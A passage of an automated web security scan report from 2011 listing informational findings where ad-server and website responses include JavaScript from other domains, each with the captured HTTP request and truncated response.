GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTc0Njg0NDcyNTQwNDcvMTA0MTIwLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVGhpaXlIaTBCQlctVzV6TXhEOW5FbDgv/s3y_oOCh3r6kEExIjKyijkGnx4A&price=TcvhHwAGp0EK7FrEovpTs1SWtx2tmnBm2xV6cA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRcf1H-HLTcHOGsS1sQezp-mXCtzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCnBjAAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtzIVcp8F8Val1fxHHRvU63fV_G8kg%26client%3Dca-pub-3629939364375984%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070545&bpp=2&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607&correlator=1305207063071&frm=0&adk=3981566363&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=3&dtd=114&xpc=HVEaewoQQ1&p=http%3A//www.milehighonthecheap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:14 GMT
Set-Cookie: mt_mop=4:1305207074; domain=.mathtag.com; path=/; expires=Sun, 11 May 2014 13:31:14 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Thu, 12 May 2011 13:31:10 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x2, ord-bidder-x1
Server: MMBD/3.5.5
Content-Length: 896
Content-Type: text/html
Connection: keep-alive

<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/I36/jview/268359963/direct/01/254397468447254047?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D254397468447254047%26mt_id%3D104120%26mt_adid%3D114%26mt_uuid%3D4dab7d35-b1d2-915a-d3c0-9d57f9c66b07%26redirect%3D"></script>
...[SNIP]...
14.9. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MTM0MjE0MDAzNTE0NzI5Ny8xMDQxMTYvMTAwNDcwLzQvUTNBbV9DbnBmUVVnTncyOVZSNGhUb0ExeVktYXJyQmxKZ3M5dXVjWmx6WS8/69EgstZIwhqHJnL-BZe0wt3Ui58&price=TcvhIQAHJNYK2k2S0EAbL5H9Zd7lJxmGV5n7xQ&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBxwt7IeHLTdbJHJKb6QavtoCCDdzvj_EB-PbyvBH0nISTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0wNzU5NDA5NjE0OTIwNDExoAHg6pnsA7IBEHd3dy5leGFtaW5lci5jb226AQozMDB4MjUwX2FzyAEJ2gF7aHR0cDovL3d3dy5leGFtaW5lci5jb20vZmlnaHQtc3BvcnRzLWluLW5hdGlvbmFsL2NvbXBsZXRlLXd3ZS1zbWFja2Rvd24tc3BvaWxlcnMtZm9yLWZyaWRheS1tYXktMTN0aC1uZXctZmFjZS1hbmQtbmV3LWZldWRzmAK6GMACBMgC1sGMDqgDAegDgAToA4ME9QMABAAEgAbthMCAz_D5j9YB%26num%3D1%26sig%3DAGiWqtwmcx-NetRG7qyZXEYSImLX8YrGgw%26client%3Dca-pub-0759409614920411%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:20 GMT
Server: MMBD/3.5.5
Content-Type: text/html
Content-Length: 891
x-mm-dbg: won
Set-Cookie: mt_mop=4:1305207080; domain=.mathtag.com; path=/; expires=Sun, 11 May 2014 13:31:20 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Thu, 12 May 2011 13:31:13 GMT
x-mm-host: ewr-bidder-x2
Connection: keep-alive

<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/I36/jview/268359912/direct/01/61342140035147297?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D61342140035147297%26mt_id%3D104116%26mt_adid%3D114%26mt_uuid%3D4dab7d35-b1d2-915a-d3c0-9d57f9c66b07%26redirect%3D"></script>
...[SNIP]...
14.10. http://cdn.optmd.com/V2/80181/197813/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197813/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/80181/197813/index.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Mon, 21 Jun 2010 19:07:15 GMT
ETag: "c1005c-151-3449ec0"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:31:49 GMT
Connection: close
Content-Length: 337

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Capella University</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://ad.doubleclick.net/adj/N5956.Casale/B3941858.4;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80181/;ord=965478884?"></script>
...[SNIP]...
14.11. http://crenk.com/buy-chromebook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /buy-chromebook/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /buy-chromebook/ HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; path=/
Last-Modified: Thu, 12 May 2011 10:10:43 +0000
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.reddit.com/button.js?t=2"></script></div><div class="socialize-button"><script src="http://www.stumbleupon.com/hostedbadge.php?s=5&r=http://crenk.com/buy-chromebook/"></script>
...[SNIP]...
</script>
   <script src = "http://badges.del.icio.us/feeds/json/url/data?url=http://crenk.com/buy-chromebook/&amp;callback=displayURL"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Crenkcom/ROS/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Crenkcom/ROS/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Crenkcom/ROS/tags.js"></script>
...[SNIP]...
<!-- WP-FB AutoConnect Init v1.9.2 -->
<script type="text/javascript" src="https://ssl.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?p&#038;ver=3.1.2'></script>
...[SNIP]...
</div>

   <script src="http://stats.wordpress.com/e-201119.js" type="text/javascript"></script>
...[SNIP]...
14.12. http://fridaythe13thfilms.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fridaythe13thfilms.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: fridaythe13thfilms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.3
X-Pingback: http://fridaythe13thfilms.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 2452

<HTML>
<HEAD>
<TITLE>Friday the 13th: The Website</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<LINK REL="SHORTCUT ICON" HREF="http://www.fridaythe13thfi
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
14.13. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-ecx.images-amazon.com
Path:   /images/G/01/pda/pda.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/G/01/pda/pda.js HTTP/1.1
Host: g-ecx.images-amazon.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/a/ifb/pda_comm2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Server
Content-Length: 9659
Last-Modified: Tue, 26 Apr 2011 00:21:46 GMT
Content-Type: application/x-javascript
X-Cache-Lookup: HIT from cdn-images.amazon.com:8080
X-Cache-Lookup: HIT from cdn-images.amazon.com:10080
Date: Thu, 12 May 2011 13:31:23 GMT
Connection: close


var slot;
var debug;
var adserver_url;
if(typeof adserver_url == "undefined") {
adserver_url = "http://pda-as.amazon.com/getad";
}
var adFetchTimer;
var adFetchStartTime;
var AD_FETCH_
...[SNIP]...
</script>');
   } else {
       document.write('<script src="http://bpx.a9.com/amzn/defaultad.js"></script>
...[SNIP]...
14.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-3518496391625584&output=html&h=250&slotname=3351414980&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&dt=1305206944291&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305206944296&frm=1&adk=1891509065&ga_vid=1410490875.1305206944&ga_sid=1305206944&ga_hid=1771882336&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=1696810228&fu=0&ifi=1&dtd=20 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:29:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4529

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
14.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1305225037&flash=10.2.154&url=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F&dt=1305207037540&bpp=4&shv=r20110427&jsv=r20110427&correlator=1305207037587&frm=0&adk=3743901038&ga_vid=1481856502.1305207031&ga_sid=1305207031&ga_hid=723212432&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=950&eid=33895150&fu=0&ifi=3&dtd=387&xpc=2n00OjaWdC&p=http%3A//www.greenfieldreporter.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:32:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14914

<!doctype html><html><head><style>a{color:#333333}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
14.16. http://mashable.com/2011/05/11/google-chrome-notebooks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mashable.com
Path:   /2011/05/11/google-chrome-notebooks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/05/11/google-chrome-notebooks/ HTTP/1.1
Host: mashable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 12 May 2011 13:26:51 GMT
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-Cacheable: Yes
Date: Thu, 12 May 2011 13:28:17 GMT
Connection: keep-alive
X-Served-By: 261655-web2
X-Cache-Hits: 0
Content-Length: 95606

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:x2="http://www.w3.org/2002/06/xhtml2" xmlns:fb="http://www.facebook.com/2008/fbml"><head><meta charset="utf-8" />
...[SNIP]...
</script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js?ver=3.0.5'></script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js?ver=3.0.5'></script>
...[SNIP]...
<![endif]--><script src="http://9.mshcdn.com/follow/packages/wp.js?1304991563" type="text/javascript"></script><script src="http://9.mshcdn.com/wp-content/themes/v7/js/core.js?1303775150"></script>
...[SNIP]...
</script> <script src="http://7.mshcdn.com/wp-content/themes/v7/js/webtrends.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://platform.twitter.com/widgets.js" async="true"></script><script src="http://stats.wordpress.com/e-201119.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://static.fmpub.net/site/mashable"></script>
...[SNIP]...
14.17. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orangeorb.blogspot.com
Path:   /2011/05/planets-align-on-friday-13th-and.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: orangeorb.blogspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: blogger_TID=17729b14830bec26; HttpOnly
Expires: Thu, 12 May 2011 13:32:05 GMT
Date: Thu, 12 May 2011 13:32:05 GMT
Cache-Control: private
Last-Modified: Thu, 12 May 2011 02:55:21 GMT
ETag: "4620d68b-a3e9-47d6-9e38-877ac81cebcb"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 155467

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr'>
<head>
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<meta content='width=1100' name='viewport'/>
<meta content='text/html; cha
...[SNIP]...
<div class='widget-content'>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=a3073d00-6b44-4a44-b071-abb99cb9fe56&amp;type=website&amp;embeds=true&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine&amp;button=false"></script>
...[SNIP]...
<div class='widget-content'>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script src="http://www.assoc-amazon.com/s/asw.js" type="text/javascript"></script>
...[SNIP]...
<p align="right"><script language="JavaScript"
src="http://www.dailyfeatures.com/corridor/fodjava.cfm?type=7"></script>
...[SNIP]...
<!-- BEGIN WebSTAT Activation Code -->
<script language="JavaScript" src="http://hits.nextstat.com/cgi-bin/wsv2.cgi?108645" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/4286431867-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
14.18. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNTA1MTgzMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=uQqyN5pqCIxFGqrovMg3sY4XSKMCItdxygQ3WXsMIsY4FLDCA9qxygAZhXsMI0eDGLDCw3gxygw7NYsMIMa4FLDCbGexygg2kXsMIsjmGLDC6ijxygAmhXsMIAY4FLDCdDmxyggihXsMIgJaGLDCcbpxygAhhXsMIca4FLDCEHoxygwoyasMIoa4FLDC4Goxygw2kXsMIYnXGLDCWGoxygwKOasM1q6AaMrhfV7qDEysGtYkBMAoNXAtmZOiGgasjMAbUa8iNSPC73cBwtIuDUAsFyrZrgqRmCrnD8ekGrcl0Pw6iaIvTC1A0kdxKzq7DEwcGrMtyNw2sasypewAP7lxKDKYE8KIGA1sVTAJqaonj+OBXTjhWHJwFsb0F8rr5XAhTaI7zCVBLRqh3jq/FEqXG3/nDbAIcYUJ1+vBVSrBDSW60awuhahBdPiB5GKvGcuKGrLmOYALjYEmGw5oGhpBxbfRYmqRHU/XGbUh4W2gLYwkxSyBvRph3OrdHAPpGL+s3cQ7jaw4z2CCCPqhjA; 